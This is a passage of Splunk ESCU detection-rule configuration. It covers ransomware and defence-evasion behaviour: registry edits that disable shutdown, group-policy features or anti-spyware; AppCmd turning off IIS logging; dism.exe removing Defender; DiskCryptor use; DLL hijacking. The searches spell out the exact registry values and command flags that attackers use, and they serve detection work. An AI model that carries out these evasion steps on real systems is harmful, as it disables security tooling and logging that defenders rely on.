action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious registry modification that disables the shutdown button for the logged-on user. This technique has been seen in several malware families, especially ransomware such as the KillDisk variant, to make the compromised host unusable and to make it hard to revert other registry modifications on the machine that need a restart to take effect. Administrators may implement this Windows feature on servers where shutdown is critical; in that scenario a filter on the machines and users that are allowed to modify this registry value is needed.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = Administrators may implement this Windows feature on servers where shutdown is critical. In that scenario a filter on the machines and users that are allowed to modify this registry value is needed.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable Shutdown Button Through Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Registry modification in "shutdownwithoutlogon" on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable Shutdown Button Through Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" Registry.registry_value_data = "0x00000000") OR (Registry.registry_path="*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" Registry.registry_value_data = "0x00000001")) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_shutdown_button_through_registry_filter`

[ESCU - Windows Disable Windows Event Logging Disable HTTP Logging - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies AppCmd.exe being utilized to disable HTTP logging on IIS. Adversaries may perform this action to disable logging and delete the logs in order to remove any trace or events on disk.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1562.002", "T1562", "T1505", "T1505.004"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies AppCmd.exe being utilized to disable HTTP logging on IIS. Adversaries may perform this action to disable logging and delete the logs in order to remove any trace or events on disk.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present only if scripts or administrators are disabling logging. Filter as needed by parent process or other fields.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable Windows Event Logging Disable HTTP Logging - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "IIS Components"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to disable IIS HTTP Logging.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable Windows Event Logging Disable HTTP Logging - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "IIS Components"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1562.002", "T1562", "T1505", "T1505.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies AppCmd.exe being utilized to disable HTTP logging on IIS. Adversaries may perform this action to disable logging and delete the logs in order to remove any trace or events on disk.
action.notable.param.rule_title = Windows Disable Windows Event Logging Disable HTTP Logging
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where NOT (Processes.parent_process_name IN ("msiexec.exe", "iissetup.exe")) Processes.process_name=appcmd.exe Processes.process IN ("*set config*", "*httplogging*","*dontlog:true*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_windows_event_logging_disable_http_logging_filter`

[ESCU - Windows Disable Windows Group Policy Features Through Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects suspicious registry modifications that disable Windows features. These techniques are seen in several ransomware families to impair the compromised host and make it hard for analysts to mitigate or respond to the attack. Disabling these well-known features makes analysis and forensic response harder. Disabling these features is not common but can still be done by administrators for security purposes; in that scenario a filter for the users who are allowed to do this is needed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects suspicious registry modifications that disable Windows features. These techniques are seen in several ransomware families to impair the compromised host and make it hard for analysts to mitigate or respond to the attack. Disabling these well-known features makes analysis and forensic response harder. Disabling these features is not common but can still be done by administrators for security purposes; in that scenario a filter for the users who are allowed to do this is needed.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = Disabling these features for legitimate purposes is not a common use case but can still be implemented by administrators. Filter as needed.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Disable Windows Group Policy Features Through Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Windows Defense Evasion Tactics", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Registry modification to disable Windows group policy features on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Disable Windows Group Policy Features Through Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*" OR Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\*") Registry.registry_value_name IN ("NoDesktop", "NoFind", "NoControlPanel", "NoFileMenu", "NoSetTaskbar", "NoTrayContextMenu", "TaskbarLockAll", "NoThemesTab", "NoPropertiesMyDocuments", "NoVisualStyleChoice", "NoColorChoice") Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_windows_group_policy_features_through_registry_filter`

[ESCU - Windows DisableAntiSpyware Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = The search looks for the registry key DisableAntiSpyware being set to a value that disables the feature. This is consistent with Ryuk infections across a fleet of endpoints. This particular behavior is typically executed when a ransomware actor gains access to an endpoint and begins to perform execution.
Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for the Registry Key DisableAntiSpyware set to disable. This is consistent with Ryuk infections across a fleet of endpoints. This particular behavior is typically executed when an ransomware actor gains access to an endpoint and beings to perform execution. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Registry` node. action.escu.known_false_positives = It is unusual to turn this feature off a Windows system since it is a default security control, although it is not rare for some policies to disable it. Although no false positives have been identified, use the provided filter macro to tune the search. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DisableAntiSpyware Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Azorult", "Ryuk Ransomware", "Windows Registry Abuse", "RedLine Stealer", "CISA AA22-264A", "Windows Defense Evasion Tactics", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Windows DisableAntiSpyware registry key set to 'disabled' on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DisableAntiSpyware Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Ryuk Ransomware", "Windows Registry Abuse", "RedLine Stealer", "CISA AA22-264A", "Windows Defense Evasion Tactics", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for the Registry Key DisableAntiSpyware set to disable. This is consistent with Ryuk infections across a fleet of endpoints. This particular behavior is typically executed when an ransomware actor gains access to an endpoint and beings to perform execution. 
Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.notable.param.rule_title = Windows DisableAntiSpyware Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_value_name="DisableAntiSpyware" AND Registry.registry_value_data="0x00000001" by Registry.dest Registry.user Registry.registry_path Registry.registry_value_data | `drop_dm_object_name(Registry)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `windows_disableantispyware_registry_filter` [ESCU - Windows DiskCryptor Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies DiskCryptor process name of dcrypt.exe or internal name dcinst.exe. This utility has been utilized by adversaries to encrypt disks manually during an operation. In addition, during install, a dcrypt.sys driver is installed and requires a reboot in order to take effect. There are no command-line arguments used. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies DiskCryptor process name of dcrypt.exe or internal name dcinst.exe. This utility has been utilized by adversaries to encrypt disks manually during an operation. In addition, during install, a dcrypt.sys driver is installed and requires a reboot in order to take effect. 
There are no command-line arguments used. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is possible false positives may be present based on the internal name dcinst.exe, filter as needed. It may be worthy to alert on the service name. action.escu.creation_date = 2021-11-15 action.escu.modification_date = 2021-11-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DiskCryptor Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DiskCryptor Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of 
events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dcrypt.exe" OR Processes.original_file_name=dcinst.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_diskcryptor_usage_filter` [ESCU - Windows Diskshadow Proxy Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = DiskShadow.exe is a Microsoft Signed binary present on Windows Server. It has a scripting mode intended for complex scripted backup operations. This feature also allows for execution of arbitrary unsigned code. This analytic looks for the usage of the scripting mode flags in executions of DiskShadow. During triage, compare to known backup behavior in your environment and then review the scripts called by diskshadow. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = DiskShadow.exe is a Microsoft Signed binary present on Windows Server. It has a scripting mode intended for complex scripted backup operations. This feature also allows for execution of arbitrary unsigned code. This analytic looks for the usage of the scripting mode flags in executions of DiskShadow. During triage, compare to known backup behavior in your environment and then review the scripts called by diskshadow. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators using the DiskShadow tool in their infrastructure as a main backup tool with scripts will cause false positives that can be filtered with `windows_diskshadow_proxy_execution_filter` action.escu.creation_date = 2022-02-15 action.escu.modification_date = 2022-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Diskshadow Proxy Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land"] action.risk = 1 action.risk.param._risk_message = Possible Signed Binary Proxy Execution on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Diskshadow Proxy Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": 
["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = DiskShadow.exe is a Microsoft Signed binary present on Windows Server. It has a scripting mode intended for complex scripted backup operations. This feature also allows for execution of arbitrary unsigned code. This analytic looks for the usage of the scripting mode flags in executions of DiskShadow. During triage, compare to known backup behavior in your environment and then review the scripts called by diskshadow. action.notable.param.rule_title = Windows Diskshadow Proxy Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_diskshadow` (Processes.process=*-s* OR Processes.process=*/s*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_diskshadow_proxy_execution_filter` [ESCU - Windows DISM Remove Defender - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of the Windows Disk Image Utility, `dism.exe`, to remove Windows Defender. Adversaries may use `dism.exe` to disable Defender before completing their objective. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of the Windows Disk Image Utility, `dism.exe`, to remove Windows Defender. Adversaries may use `dism.exe` to disable Defender before completing their objective. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate administrative tools leverage `dism.exe` to manipulate packages and features of the operating system. Filter as needed. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DISM Remove Defender - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to disable Windows Defender. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DISM Remove Defender - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of the Windows Disk Image Utility, `dism.exe`, to remove Windows Defender. Adversaries may use `dism.exe` to disable Defender before completing their objective. 
action.notable.param.rule_title = Windows DISM Remove Defender action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dism.exe (Processes.process="*/online*" AND Processes.process="*/disable-feature*" AND Processes.process="*Windows-Defender*" AND Processes.process="*/remove*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_dism_remove_defender_filter` [ESCU - Windows DLL Search Order Hijacking Hunt - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic is an experimental query built against a accidental feature using the latest Sysmon TA 3.0 (https://splunkbase.splunk.com/app/5709/) which maps the module load (ImageLoaded) to process_name. This analytic will deprecate once this is fixed. This hunting analytic identifies known libraries in Windows that may be used in a DLL search order hijack or DLL Sideloading setting. This may require recompiling the DLL, moving the DLL or moving the vulnerable process. The query looks for any running out of system32 or syswow64. Some libraries natively run out of other application paths and will need to be added to the exclusion as needed. The lookup is comprised of Microsoft native libraries identified within the Hijacklibs.net project. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001", "T1574"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic is an experimental query built against a accidental feature using the latest Sysmon TA 3.0 (https://splunkbase.splunk.com/app/5709/) which maps the module load (ImageLoaded) to process_name. This analytic will deprecate once this is fixed. This hunting analytic identifies known libraries in Windows that may be used in a DLL search order hijack or DLL Sideloading setting. This may require recompiling the DLL, moving the DLL or moving the vulnerable process. The query looks for any running out of system32 or syswow64. Some libraries natively run out of other application paths and will need to be added to the exclusion as needed. The lookup is comprised of Microsoft native libraries identified within the Hijacklibs.net project. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives will be present based on paths. Filter or add other paths to the exclusion as needed. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DLL Search Order Hijacking Hunt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land", "Windows Defense Evasion Tactics"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DLL Search Order Hijacking Hunt - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land", "Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 10, "impact": 10, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001", "T1574"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name from datamodel=Endpoint.Processes where Processes.dest!=unknown Processes.user!=unknown NOT (Processes.process_path IN ("*\\system32\\*", "*\\syswow64\\*","*\\winsxs\\*","*\\wbem\\*")) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | lookup hijacklibs library AS process_name OUTPUT islibrary | search islibrary = True | rename parent_process_name as process_name , process_name AS ImageLoaded, process_path AS 
Module_Path | `windows_dll_search_order_hijacking_hunt_filter` [ESCU - Windows DLL Search Order Hijacking Hunt with Sysmon - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic is query built against a accidental feature using the latest Sysmon TA 3.0 (https://splunkbase.splunk.com/app/5709/) which maps the module load (ImageLoaded) to process_name. This analytic will deprecate once this is fixed. This hunting analytic identifies known libraries in Windows that may be used in a DLL search order hijack or DLL Sideloading setting. This may require recompiling the DLL, moving the DLL or moving the vulnerable process. The query looks for any running out of system32 or syswow64. Some libraries natively run out of other application paths and will need to be added to the exclusion as needed. The lookup is comprised of Microsoft native libraries identified within the Hijacklibs.net project. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001", "T1574"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic is query built against a accidental feature using the latest Sysmon TA 3.0 (https://splunkbase.splunk.com/app/5709/) which maps the module load (ImageLoaded) to process_name. This analytic will deprecate once this is fixed. This hunting analytic identifies known libraries in Windows that may be used in a DLL search order hijack or DLL Sideloading setting. This may require recompiling the DLL, moving the DLL or moving the vulnerable process. The query looks for any running out of system32 or syswow64. Some libraries natively run out of other application paths and will need to be added to the exclusion as needed. The lookup is comprised of Microsoft native libraries identified within the Hijacklibs.net project. 
action.escu.how_to_implement = The latest Sysmon TA 3.0 https://splunkbase.splunk.com/app/5709 will add the ImageLoaded name to the process_name field, allowing this query to work. Use as an example and implement for other products. action.escu.known_false_positives = False positives will be present based on paths. Filter or add other paths to the exclusion as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DLL Search Order Hijacking Hunt with Sysmon - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Living Off The Land", "Windows Defense Evasion Tactics", "Qakbot"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DLL Search Order Hijacking Hunt with Sysmon - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land", "Windows Defense Evasion Tactics", "Qakbot"], "cis20": ["CIS 10"], "confidence": 10, "impact": 10, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": 